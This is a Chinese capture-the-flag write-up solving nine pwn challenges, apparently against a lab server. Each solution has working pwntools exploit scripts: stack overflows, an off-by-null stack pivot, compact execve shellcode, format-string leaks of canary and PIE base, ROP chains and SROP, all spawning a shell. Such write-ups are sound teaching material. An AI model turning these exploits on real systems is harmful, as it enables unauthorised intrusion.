Pwn
pwn1
简单看下逻辑,密钥相同即可拿shell,但是中文乱码加上我对ida这部分操作不熟悉哈,所以gdb调试看中文内容
首先追踪进去看到s2地址是0x40201e,checksec检查没pie,于是直接用x查看
拿shell得到flag
pwn2
简单分析,入眼就是一个栈溢出,又发现后门,直接拿到后门地址,考虑到栈平衡,直接取0x40201e
地址有了0x40201e,偏移也有了0xa,直接写脚本(因为套的模板所以比较长,其实就写了三行)
exp:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
# elf = ELF(pwnfile)
# libc = ELF(libcfile)
# sh = process(pwnfile)
sh = remote("10.10.0.200",32865)
context(os='linux',arch='amd64')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
pwnme = 0x401203
padding = b'a'*(0xa+8)
#-------------------------------------------------------#
def exploit():
payload = flat(padding,pwnme)
sl(payload)
if __name__ == '__main__':
# bug()
exploit()
over()
打通拿shell
pwn3
ida看逻辑,怎么还是栈溢出
嘶,仔细看v5是整型,4字节,刚刚我把它当成字符了,不过不影响,要写4字节的数字p32很合适
exp:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
# elf = ELF(pwnfile)
# libc = ELF(libcfile)
# sh = process(pwnfile)
sh = remote("10.10.0.200",32868)
context(os='linux',arch='amd64')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
#-------------------------------------------------------#
def exploit():
padding = b'a'*44
payload = padding + p32(520)
sl(payload)
if __name__ == '__main__':
# bug()
exploit()
over()
打通拿shell
pwn4
简单分析,乍一看没有溢出
buffer在bss段,而且也是0x100的输入,就算被拷贝到dest好像也没溢出。
其实不然,搜索strcpy的函数原型知,拷贝完成后dest的最后会自动添加一个\0,表示字符串的结束,于是此处我们便有了off-by-null,也即单字节溢出。
单字节溢出可以干神马呢?答案是栈迁移,
可看到图中bp和old_bp指向的位置很近,当最后一字节为\x00时,有很大概率可以利用随后的两个level;ret;level;ret;将栈向前迁移到可控部分继续执行。(图示为最糟糕情况,即old_bp本身就是00)
同时由于还给了libc文件,此处我直接选择打ogg。
随后跳转回所以思路就是off-by-null然后布栈,这里选用0xebce2这个ogg,可以看到条件还差一个rbp-0x48可写,直接将其迁移到bss段即可。
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
elf = ELF(pwnfile)
libc = ELF(libcfile)
# sh = process(pwnfile)
sh = remote("10.10.0.200",32869)
context(os='linux',arch='amd64',log_level='debug')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
ogg = [0xebd43,0xebce2]
#-------------------------------------------------------#
def exploit():
padding = b'a'*0x100
s(padding)
libc_base = uu64() - libc.sym["puts"]
li("libc_base",libc_base)
li("libc_ogg",libc_base+ogg[1])
payload = (p64(elf.bss()+0x800)+p64(libc_base+ogg[1]))*0x10
s(payload)
if __name__ == '__main__':
# bug()
exploit()
over()
打通拿shell
pwn5
简单分析,开头读入0x20字节到buff,随后执行buff,那么之前的部分目的应该是为了管理权限,不过无所谓,那个不重要。
重要的是可以看到我们只有32个字节的输入,这种情况下肯定是无法直接用shellcraft.sh()了,于是简单搜了一下,发现把mov换成pop和push就可以节省许多字节,于是直接写一小段汇编调用execve("/bin/sh\0",0,0)。
exp:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
# elf = ELF(pwnfile)
# libc = ELF(libcfile)
# sh = process(pwnfile)
sh = remote("10.10.0.200",32873)
context(os='linux',arch='amd64',log_level='debug')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
#-------------------------------------------------------#
def exploit():
code = """
mov rbx, 0x0068732f6e69622f
push rbx
push rsp
pop rdi
xor esi,esi
xor edx,edx
push 59
pop rax
syscall
"""
shellcode = asm(code)
print(len(shellcode))
s(shellcode)
if __name__ == '__main__':
# bug()
exploit()
over()
打通拿shell
pwn6
检查下保护,嘿嘿?保护开的怪全嘞
有格式化字符串漏洞,还有一个到ret的栈溢出
并且第6行可以看出,还开启了canary保护
另外发现调用了system函数,虽然echo flag没什么用,但是call systen还是可以用的。于是只需要控制rdi指向binsh然后执行这一处就好了。刚好有pop可以用来控制
但是开启了地址随机保护(pie),于是想到用format String泄露地址。先用%p测一下找找有用的偏移。
调试的时候分别看一下里面的内容,
我们关心的只有第1个、11个、15个分别是format参数,canary内容,main地址。
这三个分别对应 栈,canary,程序。有地址有溢出就可以为所欲为了,唯一注意的是溢出长度不太够,其实按常规思路来写的话这里要利用read进行栈迁移布栈,但是由于main函数输入的buf内容刚好在栈顶位置,于是可以跳转回main,先控制buf内容布栈再进行溢出直接getshell
exp:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
elf = ELF(pwnfile)
# libc = ELF(libcfile)
# sh = process(pwnfile)
sh = remote("10.10.0.200",32877)
context(os='linux',arch='amd64',log_level='debug')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
pop_rdi_sym = 0x1245
ret_sym = 0x101a
main_sym = 0x125b
#-------------------------------------------------------#
def exploit():
payload = "/bin/sh;#%p#%11$p#%15$p"
sa(b'Pondering the past as I stand in the remnants of the setting sun.\n',payload)
ru(b"#")
dist = r().decode().split('#')
stack = int(dist[0],16)
canary = int(dist[1],16)
main = int(dist[2],16)
sym_base = main - main_sym
pop_rdi = sym_base + pop_rdi_sym
ret = sym_base + ret_sym
call_system = main-8
payload = b'a'*8+p64(canary)+b'b'*8+p64(main+5)
s(payload)
payload = flat([stack,call_system])
sa(b'Pondering the past as I stand in the remnants of the setting sun.\n',payload)
r()
payload = b'a'*8+p64(canary)+b'a'*8+p64(pop_rdi)
s(payload)
if __name__ == '__main__':
# bug()
exploit()
over()
打通拿shell
pwn7
静态链接的程序,所以ret2libc打不了,不过没开pie,所以程序地址可知
看看反汇编代码
仅有四个函数调用,
前两个函数中只有puts,没啥好看的。第三个函数有一次输入,有溢出。
第四个函数中让输入一个数字,似乎是用作判断的,可以看到只有在输入1时会进入函数
看看这个函数,一眼栈溢出
运行一下看看
注意到第一次输入后的输出有异常,按照常理来说这里应该会输出我输入的“名字”来着
发现这里用的是%p,也就是说这里是v1参数的栈地址,其实也可以调试来看
另外发现一些gadgets和syscall
所以打syscall就好,binsh字符串就放在第一次输入的地方。
利用小gadgets构建rop链控制rdi,rsi,rax
EXP:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
elf = ELF(pwnfile)
# libc = ELF(libcfile)
sh = process(pwnfile)
# sh = remote("node5.anna.nssctf.cn",29153)
context(os='linux',arch='amd64',log_level='debug')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(12),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
pop_rsi_rdi_rax = 0x4011e1
syscall_ret = 0x4011ec
padding = b"/bin/sh\0" + b'a'*0x20
#-------------------------------------------------------#
def exploit():
sla("请输入你的名字: ",b"/bin/sh\0")
ru("0x")
stack = iuu64()
sla('请输入你的选择 (1-3): ',nb(1))
payload = flat([padding,pop_rsi_rdi_rax,0,stack,59,syscall_ret])
sa('请输入你的新诗(不超过255个字符): \n',payload)
if __name__ == '__main__':
# bug()
exploit()
over()
pwn8
一次输入,输入内容经过sub_401320函数处理之后会被复制到dest中,另外发现复制时计算的长度是s的,这样子可能会导致隐性的错误,先记上吧
所以直接调试看处理结果
我的输入是一一串a,但是输出却是一串具有某种规律的数字,继续测试规律
四字节变三字节,怎么看着这么像base64解码啊
经测试,就是base64编码,只不过在末尾的处理上可能有点小问题,所以拷贝的时候就会多拷贝点东西,这里妥妥的有溢出啊。另,发现后门函数
直接把payload给base64加密就好。直接跳转到后门函数。唯一需要注意的可能就是栈平衡了,这里多加个ret就好。
exp:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./pwn'
libcfile = './libc.so.6'
elf = ELF(pwnfile)
# libc = ELF(libcfile)
sh = process(pwnfile)
# sh = remote("node5.anna.nssctf.cn",29153)
context(os='linux',arch='amd64',log_level='debug')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
backdoor = 0x40141D
padding = b'a'*0x68
ret = 0x40101a
#-------------------------------------------------------#
def exploit():
payload = flat([padding,ret,backdoor])
payload = base64.b64encode(payload)
sl(payload)
log.info(payload)
if __name__ == '__main__':
bug()
exploit()
over()
打通拿shell
pwn9
没保护,也没引用libc库
反汇编代码也少的可怜,gadgets可以控制rsi和rax,可以执行syscall。
输出直接写到栈上。感觉没有任何办法控制rdi,严重怀疑出题人是不是出错了,gadgets应该是控制rdi而不是rsi吧?
其实没有,考点是SROP.
可以控制rax,且有足够的输人空间,且可以直接执行syscall。不用犹豫了,直接打SROP
pwntools中集成了SROP攻击,可以帮助我们进行布栈
exp:
from pwn import *
import ctypes
from time import sleep
from LibcSearcher import LibcSearcher
pwnfile='./output_file'
libcfile = './libc.so.6'
elf = ELF(pwnfile)
# libc = ELF(libcfile)
sh = process(pwnfile)
# sh = remote("node5.anna.nssctf.cn",29153)
context(os='linux',arch='amd64',log_level='debug')
s = lambda x: sh.send(x)
sl = lambda x: sh.sendline(x)
sa = lambda x,y: sh.sendafter(x,y)
sla = lambda x,y: sh.sendlineafter(x,y)
r = lambda : sh.recv()
re = lambda x: sh.recv(x)
ru = lambda x: sh.recvuntil(x)
over = lambda : sh.interactive()
nb = lambda x: str(x).encode()
li = lambda x,y: log.info(x+'==>'+hex(y))
bug =lambda : gdb.attach(sh)
uu32 = lambda : u32(sh.recvuntil(b"\xff")[-4:].ljust(4, b'\x00')) # 这部分功能并不好用
uu64 = lambda : u64(sh.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(sh.recv(10),16)
iuu64 = lambda : int(sh.recv(16),16)
uheap = lambda : u64(sh.recv(6).ljust(8,b'\x00'))
orw = lambda x,y: asm(shellcraft.open(x)+shellcraft.read(3,y,0x100)+shellcraft.write(1,y,0x100)) # 返回字节码
#------------------*-功能代码块-*-----------------------#
# # rand随机数种子 import ctypes time
# def rand_seed():
# libc = ctypes.CDLL(libcfile)
# srand = libc.srand
# rand = libc.rand
# srand(int(time.time()))
# sl(nb(rand()%100+1))
# puts_got = elf.got['puts']
# puts_plt = elf.sym['puts']
# li("puts_got",puts_got)
# li("puts_plt",puts_plt)
# puts_addr = uu64()
# libc = LibcSearcher.LibcSearcher("puts",puts_addr)
# libc_base = puts_addr - libc.dump["puts"]
# system = libc_base + libc.dump["system"]
# binsh = libc_base + libc.dump["str_bin_sh"]
pop_rax = 0x40104a
binsh = 0x40203A
syscall = 0x401045
#-------------------------------------------------------#
def exploit():
signalFrame=SigreturnFrame()
signalFrame.rax=59
signalFrame.rdi=binsh
signalFrame.rsi=0x0
signalFrame.rdx=0x0
signalFrame.rip=syscall
signalFrame.rsp=0x402800
payload = flat([0x402800,pop_rax,15,syscall]) + flat(signalFrame)
s(payload)
if __name__ == '__main__':
bug()
exploit()
over()
打通拿shell
本文由 mdnice 多平台发布
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
